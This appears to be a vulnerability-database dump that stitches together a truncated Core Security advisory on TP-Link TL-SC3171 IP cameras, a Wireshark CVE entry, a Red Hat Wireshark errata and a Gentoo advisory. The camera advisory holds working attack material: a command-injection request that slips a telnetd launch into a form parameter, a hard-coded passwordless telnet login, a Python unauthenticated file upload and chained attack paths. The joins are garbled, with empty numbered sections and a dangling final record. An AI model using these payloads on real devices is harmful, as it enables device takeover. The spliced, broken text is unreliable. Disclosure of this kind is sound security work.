Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581
3. [CVE-2013-2578] to execute arbitrary commands through the file
'/cgi-bin/admin/servetest'.
2. [CVE-2013-2579] to execute arbitrary commands in a shell using
hard-coded credentials.
3.
5.
3.1. *Attack Paths*
There are several attack paths that can be exploited by combining these
vulnerabilities with other ones discovered by Eliezer Varade Lopez,
Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack
paths are available, but the ones listed here allow understanding how an
attacker could compromise the affected device.
3.1.1. *Attack Path I*
(Authentication: none)
1. Upload a rooted firmware exploiting [CVE-2013-2581].
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3.1.2. *Attack Path II*
(Authentication: bypassed)
1. Reset the device to its factory defaults exploiting
'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the
authentication can by bypassed by using 'admin:admin' as a valid
'username:password'.
2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2].
3. Start the Telnet service exploiting [CVE-2013-2578].
4. Login to the Telnet service using user 'qmik' (no password)
[CVE-2013-2579], and use the device as a pivoting point.
4. *Vulnerable Packages*
Tests and PoC were run on:
.
5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to (pre-release) patched firmware versions
[3]. The final official versions will be released in the next few days.
Please, contact TP-Link for further information.
6. *Credits*
These vulnerabilities were discovered by Flavio de Cristofaro and
researched with the help of Andres Blanco from Core Security
Technologies. The publication of this advisory was coordinated by
Fernando Miranda from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection in servetest*
[CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command
injection in several of its parameters that can be exploited by an
authenticated user to execute arbitrary commands. The following proof of
concept starts the telnetd service:
/-----
GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
-----/
7.2. *Hard-coded credentials in telnet service*
[CVE-2013-2579] The affected system includes a hard-coded login with no
password which could be used by a remote attacker to access the OS of
the affected device using the built-in telnet service:
/-----
username: qmik
password: (none)
-----/
The 'qmik' user is allowed to execute the command 'su', allowing the
user to execute arbitrary commands with root level privileges. The
telnet service can be enabled through [CVE-2013-2578].
7.3. *Unauthenticated remote file uploads*
[CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated
user to perform remote file uploads as shown in the following Python PoC:
/-----
import requests
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("http://192.168.1.100/cgi-bin/uploadfile",
files={fileName: open(fileName, "rb")})
-----/
The uploaded file (in this example lala.tmp) will be hosted in the
'/mnt/mtd' directory.
7.4. *Report Timeline*
. 2013-06-12:
Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18:
Core Security Technologies notifies the TP-Link team of the
vulnerability and set the estimated publication date of the advisory for
July 10, 2013. 2013-06-19:
TP-Link answers saying that these vulnerabilities are the same as the
ones published on May 28, 2013. 2013-06-26:
Core Security Technologies notifies the TP-Link team that these are new,
different, vulnerabilities and sends a draft report with technical
information. 2013-06-26:
Vendor acknowledges the receipt of the technical report. 2013-07-01:
Vendor requests additional technical information. 2013-07-04:
Core re-sends an improved technical report with additional information
regarding possible attack paths [Sec. 3.1]. 2013-07-10:
First release date missed. 2013-07-15:
Core asks for a status update. 2013-07-22:
Vendor notifies that a patched firmware version will be released on July
29th. 2013-07-22:
Core re-schedules the advisory publication for July 29th. 2013-07-26:
Vendor notifies that a (pre-release) patched firmware version is
available [3] and being tested. The final firmware version will be
released in the next few days. 2013-07-30:
Advisory CORE-2013-0618 is published.
9. *References*
[1] TP-Link TL-SC3171,
http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras,
http://seclists.org/fulldisclosure/2013/Jun/84.
[3] See the online version,
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201307-0433 | CVE-2013-4936 | Wireshark PROFINET Real-Time Parser Malformed Message Handling Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The IsDFP_Frame function in plugins/profinet/packet-pn-rt.c in the PROFINET Real-Time dissector in Wireshark 1.10.x before 1.10.1 does not validate MAC addresses, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted packet. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Wireshark is an open source network protocol analysis tool. The dissect_smtp function (epan/dissectors/packet-smtp.c) in the Wireshark PROFINET Real-Time parser incorrectly initializes the length field under certain exception conditions, allowing the attacker to submit special messages to trick the application into parsing. Wireshark is prone to multiple denial-of-service vulnerabilities
Attackers can exploit these issues to crash the application resulting in denial-of-service conditions.
Note: The issue described by CVE-2013-4933 has been moved to BID 62868 (Wireshark CVE-2013-4933 Denial of Service Vulnerability) for better documentation.
Wireshark versions 1.10.0 and 1.8.0 through 1.8.8 are vulnerable.
CVE-2013-3540, CVE-2013-3541, CVE-2013-3542 should be interpreted as
CVE-2013-3560, CVE-2013-3561 and CVE-2013-3562 accordingly.
The corrected sections appear below. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: wireshark security, bug fix, and enhancement update
Advisory ID: RHSA-2013:1569-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1569.html
Issue date: 2013-11-21
Keywords: Rebase
CVE Names: CVE-2012-2392 CVE-2012-3825 CVE-2012-4285
CVE-2012-4288 CVE-2012-4289 CVE-2012-4290
CVE-2012-4291 CVE-2012-4292 CVE-2012-5595
CVE-2012-5597 CVE-2012-5598 CVE-2012-5599
CVE-2012-5600 CVE-2012-6056 CVE-2012-6059
CVE-2012-6060 CVE-2012-6061 CVE-2012-6062
CVE-2013-3557 CVE-2013-3559 CVE-2013-3561
CVE-2013-4081 CVE-2013-4083 CVE-2013-4927
CVE-2013-4931 CVE-2013-4932 CVE-2013-4933
CVE-2013-4934 CVE-2013-4935 CVE-2013-4936
CVE-2013-5721
=====================================================================
1. Summary:
Updated wireshark packages that fix multiple security issues, several bugs,
and add various enhancements are now available for Red Hat Enterprise
Linux 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3.
It is used to capture and browse the traffic running on a computer network. If Wireshark read a malformed packet off
a network or opened a malicious dump file, it could crash or, possibly,
execute arbitrary code as the user running Wireshark. (CVE-2013-3559,
CVE-2013-4083)
Several denial of service flaws were found in Wireshark. Wireshark could
crash or stop responding if it read a malformed packet off a network, or
opened a malicious dump file. (CVE-2012-2392, CVE-2012-3825, CVE-2012-4285,
CVE-2012-4288, CVE-2012-4289, CVE-2012-4290, CVE-2012-4291, CVE-2012-4292,
CVE-2012-5595, CVE-2012-5597, CVE-2012-5598, CVE-2012-5599, CVE-2012-5600,
CVE-2012-6056, CVE-2012-6059, CVE-2012-6060, CVE-2012-6061, CVE-2012-6062,
CVE-2013-3557, CVE-2013-3561, CVE-2013-4081, CVE-2013-4927, CVE-2013-4931,
CVE-2013-4932, CVE-2013-4933, CVE-2013-4934, CVE-2013-4935, CVE-2013-4936,
CVE-2013-5721)
The wireshark packages have been upgraded to upstream version 1.8.10, which
provides a number of bug fixes and enhancements over the previous versions.
For more information on the bugs fixed, enhancements included, and
supported protocols introduced, refer to the Wireshark Release Notes,
linked to in the References. (BZ#711024)
This update also fixes the following bugs:
* Previously, Wireshark did not parse the RECLAIM-COMPLETE opcode when
inspecting traffic generated by NFSv4.1. A patch has been provided to
enable the parsing of the RECLAIM_COMPLETE opcode, and Wireshark is now
able to properly dissect and handle NFSv4.1 traffic. (BZ#750712)
* Prior to this update, frame arrival times in a text file were reported
one hour ahead from the timestamps in the packet capture file.
This resulted in various failures being reported by the dfilter-test.py
test suite. To fix this bug, frame arrival timestamps have been shifted by
one hour, thus fixing this bug. (BZ#832021)
* The "tshark -D" command returned output to STDERR instead of STDOUT,
which could break scripts that are parsing the "tshark -D" output. This bug
has been fixed, and the "tshark -D" command now writes output data to a
correct standard stream. (BZ#1004636)
* Due to an array overrun, Wireshark could experience undefined program
behavior or could unexpectedly terminate. With this update, proper array
handling ensures Wireshark no longer crashes in the described scenario.
(BZ#715560)
* Previously, the dftest and randpkt command line utilities lacked manual
pages. This update adds proper manual pages for both utilities. (BZ#659661)
In addition, this update adds the following enhancements:
* With this update, Wireshark is able to properly dissect and handle
InfiniBand and GlusterFS traffic. (BZ#699636, BZ#858976)
All Wireshark users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements. All running instances of Wireshark must be restarted for the
update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
659661 - dftest and randpkt does not have a man page
711024 - Rebase wireshark to latest upstream stable release
715560 - Defects revealed by Coverity scan
750712 - NFS4.1: parse RECLAIM_COMPLETE opcode
824411 - CVE-2012-2392 wireshark: Infinite and large loops in ANSI MAP, ASF, IEEE 802.11, IEEE 802.3, and LTP dissectors (wnpa-sec-2012-08)
832021 - Frame arrival times (pcap) are 1 hour more than timestamps in txt
836960 - CVE-2012-3825 wireshark: Integer overflows in BACapp and Bluetooth HCI dissectors, leading to DoS (wnpa-sec-2012-08)
848541 - CVE-2012-4285 wireshark: crash due to zero division in DCP ETSI dissector (wnpa-sec-2012-13)
848548 - CVE-2012-4288 wireshark: DoS via excessive resource consumption in XTP dissector (wnpa-sec-2012-15)
848561 - CVE-2012-4289 wireshark: DoS via excessive CPU consumption in AFP dissector (wnpa-sec-2012-17)
848572 - CVE-2012-4291 wireshark: DoS via excessive system resource consumption in CIP dissector (wnpa-sec-2012-20)
848575 - CVE-2012-4292 wireshark: crash in STUN dissector (wnpa-sec-2012-21)
848578 - CVE-2012-4290 wireshark: DoS via excessive CPU consumption in CTDB dissector (wnpa-sec-2012-23)
881742 - CVE-2012-5600 CVE-2012-6062 wireshark: DoS (infinite loop) in the RTCP dissector (wnpa-sec-2012-38)
881748 - CVE-2012-5599 CVE-2012-6061 wireshark: DoS (infinite loop) in the WTP dissector (wnpa-sec-2012-37)
881771 - CVE-2012-5598 CVE-2012-6060 wireshark: DoS (infinite loop) in the iSCSI dissector (wnpa-sec-2012-36)
881790 - CVE-2012-5597 CVE-2012-6059 wireshark: DoS (crash) in the ISAKMP dissector (wnpa-sec-2012-35)
881809 - CVE-2012-5595 CVE-2012-6056 wireshark: DoS (infinite loop) in the SCTP dissector (wnpa-sec-2012-33)
889346 - The NFSv4.1dissectors need to updated to the latest upstream release
965190 - CVE-2013-3559 wireshark: DoS (crash) in the DCP ETSI dissector (wnpa-sec-2013-27, upstream #8231, #8540, #8541)
965193 - CVE-2013-3557 wireshark: DoS (crash) in the ASN.1 BER dissector (wnpa-sec-2013-25, upstream #8599)
966331 - CVE-2013-3561 wireshark: Multiple Denial of Service flaws
972686 - CVE-2013-4081 wireshark: DoS (infinite loop) in the HTTP dissector (wnpa-sec-2013-39)
972688 - CVE-2013-4083 wireshark: Invalid free in the DCP ETSI dissector (wnpa-sec-2013-41)
990166 - CVE-2013-4927 wireshark: Integer signedness error in the Bluetooth SDP dissector (wnpa-sec-2013-45)
990170 - CVE-2013-4931 wireshark: DoS (infinite loop) in the GSM RR dissector (wnpa-sec-2013-49)
990172 - CVE-2013-4932 wireshark: Multiple array index errors in the GSM A Common dissector (wnpa-sec-2013-50)
990175 - CVE-2013-4933 wireshark: DoS (application crash) in the Netmon file parser (wnpa-sec-2013-51)
990178 - CVE-2013-4934 wireshark: DoS (application crash) in the Netmon file parser (wnpa-sec-2013-51) (A different flaw than CVE-2013-4933)
990179 - CVE-2013-4935 wireshark: DoS (application crash) in the ASN.1 PER dissector (wnpa-sec-2013-52)
990180 - CVE-2013-4936 wireshark: DoS (NULL pointer dereference, crash) in the PROFINET Real-Time dissector (wnpa-sec-2013-53)
1007197 - CVE-2013-5721 wireshark: MQ dissector crash (wnpa-sec-2013-58, upstream bug 9079)
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-gnome-1.8.10-4.el6.i686.rpm
x86_64:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-1.8.10-4.el6.x86_64.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-gnome-1.8.10-4.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
x86_64:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-gnome-1.8.10-4.el6.i686.rpm
ppc64:
wireshark-1.8.10-4.el6.ppc.rpm
wireshark-1.8.10-4.el6.ppc64.rpm
wireshark-debuginfo-1.8.10-4.el6.ppc.rpm
wireshark-debuginfo-1.8.10-4.el6.ppc64.rpm
wireshark-gnome-1.8.10-4.el6.ppc64.rpm
s390x:
wireshark-1.8.10-4.el6.s390.rpm
wireshark-1.8.10-4.el6.s390x.rpm
wireshark-debuginfo-1.8.10-4.el6.s390.rpm
wireshark-debuginfo-1.8.10-4.el6.s390x.rpm
wireshark-gnome-1.8.10-4.el6.s390x.rpm
x86_64:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-1.8.10-4.el6.x86_64.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-gnome-1.8.10-4.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
ppc64:
wireshark-debuginfo-1.8.10-4.el6.ppc.rpm
wireshark-debuginfo-1.8.10-4.el6.ppc64.rpm
wireshark-devel-1.8.10-4.el6.ppc.rpm
wireshark-devel-1.8.10-4.el6.ppc64.rpm
s390x:
wireshark-debuginfo-1.8.10-4.el6.s390.rpm
wireshark-debuginfo-1.8.10-4.el6.s390x.rpm
wireshark-devel-1.8.10-4.el6.s390.rpm
wireshark-devel-1.8.10-4.el6.s390x.rpm
x86_64:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-gnome-1.8.10-4.el6.i686.rpm
x86_64:
wireshark-1.8.10-4.el6.i686.rpm
wireshark-1.8.10-4.el6.x86_64.rpm
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-gnome-1.8.10-4.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/wireshark-1.8.10-4.el6.src.rpm
i386:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
x86_64:
wireshark-debuginfo-1.8.10-4.el6.i686.rpm
wireshark-debuginfo-1.8.10-4.el6.x86_64.rpm
wireshark-devel-1.8.10-4.el6.i686.rpm
wireshark-devel-1.8.10-4.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-2392.html
https://www.redhat.com/security/data/cve/CVE-2012-3825.html
https://www.redhat.com/security/data/cve/CVE-2012-4285.html
https://www.redhat.com/security/data/cve/CVE-2012-4288.html
https://www.redhat.com/security/data/cve/CVE-2012-4289.html
https://www.redhat.com/security/data/cve/CVE-2012-4290.html
https://www.redhat.com/security/data/cve/CVE-2012-4291.html
https://www.redhat.com/security/data/cve/CVE-2012-4292.html
https://www.redhat.com/security/data/cve/CVE-2012-5595.html
https://www.redhat.com/security/data/cve/CVE-2012-5597.html
https://www.redhat.com/security/data/cve/CVE-2012-5598.html
https://www.redhat.com/security/data/cve/CVE-2012-5599.html
https://www.redhat.com/security/data/cve/CVE-2012-5600.html
https://www.redhat.com/security/data/cve/CVE-2012-6056.html
https://www.redhat.com/security/data/cve/CVE-2012-6059.html
https://www.redhat.com/security/data/cve/CVE-2012-6060.html
https://www.redhat.com/security/data/cve/CVE-2012-6061.html
https://www.redhat.com/security/data/cve/CVE-2012-6062.html
https://www.redhat.com/security/data/cve/CVE-2013-3557.html
https://www.redhat.com/security/data/cve/CVE-2013-3559.html
https://www.redhat.com/security/data/cve/CVE-2013-3561.html
https://www.redhat.com/security/data/cve/CVE-2013-4081.html
https://www.redhat.com/security/data/cve/CVE-2013-4083.html
https://www.redhat.com/security/data/cve/CVE-2013-4927.html
https://www.redhat.com/security/data/cve/CVE-2013-4931.html
https://www.redhat.com/security/data/cve/CVE-2013-4932.html
https://www.redhat.com/security/data/cve/CVE-2013-4933.html
https://www.redhat.com/security/data/cve/CVE-2013-4934.html
https://www.redhat.com/security/data/cve/CVE-2013-4935.html
https://www.redhat.com/security/data/cve/CVE-2013-4936.html
https://www.redhat.com/security/data/cve/CVE-2013-5721.html
https://access.redhat.com/security/updates/classification/#moderate
http://www.wireshark.org/docs/relnotes/wireshark-1.8.0.html
http://www.wireshark.org/docs/relnotes/wireshark-1.6.0.html
http://www.wireshark.org/docs/relnotes/wireshark-1.4.0.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSjYqGXlSAg2UNWIIRAnatAJ4hcxmq2lZTiFc7BQntM4OiVMjOSwCgpBbh
XDje1WsK1vLhvQ0dMlB3Bho=
=ni2z
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Wireshark: Multiple vulnerabilities
Date: August 28, 2013
Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694
ID: 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Wireshark, allowing remote
attackers to execute arbitrary code or cause Denial of Service.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/wireshark < 1.10.1 >= 1.10.1
*>= 1.8.9
Description
===========
Multiple vulnerabilities have been discovered in Wireshark. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process or cause a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Wireshark 1.10 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1"
All Wireshark 1.8 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9"
References
==========
[ 1 ] CVE-2012-0041
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041
[ 2 ] CVE-2012-0042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042
[ 3 ] CVE-2012-0043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043
[ 4 ] CVE-2012-0066
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066
[ 5 ] CVE-2012-0067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067
[ 6 ] CVE-2012-0068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068
[ 7 ] CVE-2012-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548
[ 8 ] CVE-2012-4048
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048
[ 9 ] CVE-2012-4049
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049
[ 10 ] CVE-2012-4285
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285
[ 11 ] CVE-2012-4286
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286
[ 12 ] CVE-2012-4287
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287
[ 13 ] CVE-2012-4288
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288
[ 14 ] CVE-2012-4289
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289
[ 15 ] CVE-2012-4290
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290
[ 16 ] CVE-2012-4291
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291
[ 17 ] CVE-2012-4292
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292
[ 18 ] CVE-2012-4293
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293
[ 19 ] CVE-2012-4294
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294
[ 20 ] CVE-2012-4295
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295
[ 21 ] CVE-2012-4296
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296
[ 22 ] CVE-2012-4297
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297
[ 23 ] CVE-2012-4298
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298
[ 24 ] CVE-2013-3540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540
[ 25 ] CVE-2013-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541
[ 26 ] CVE-2013-3542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542
[ 27 ] CVE-2013-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555
[ 28 ] CVE-2013-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556
[ 29 ] CVE-2013-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557
[ 30 ] CVE-2013-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558
[ 31 ] CVE-2013-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559
[ 32 ] CVE-2013-4074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074
[ 33 ] CVE-2013-4075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075
[ 34 ] CVE-2013-4076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076
[ 35 ] CVE-2013-4077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077
[ 36 ] CVE-2013-4078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078
[ 37 ] CVE-2013-4079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079
[ 38 ] CVE-2013-4080
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080
[ 39 ] CVE-2013-4081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081
[ 40 ] CVE-2013-4082
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082
[ 41 ] CVE-2013-4083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083
[ 42 ] CVE-2013-4920
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920
[ 43 ] CVE-2013-4921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921
[ 44 ] CVE-2013-4922
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922
[ 45 ] CVE-2013-4923
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923
[ 46 ] CVE-2013-4924
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924
[ 47 ] CVE-2013-4925
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925
[ 48 ] CVE-2013-4926
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926
[ 49 ] CVE-2013-4927
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927
[ 50 ] CVE-2013-4928
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928
[ 51 ] CVE-2013-4929
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929
[ 52 ] CVE-2013-4930
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930
[ 53 ] CVE-2013-4931
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931
[ 54 ] CVE-2013-4932
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932
[ 55 ] CVE-2013-4933
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933
[ 56 ] CVE-2013-4934
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934
[ 57 ] CVE-2013-4935
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935
[ 58 ] CVE-2013-4936
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201308-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201402-0099 | CVE-2013-3098 |
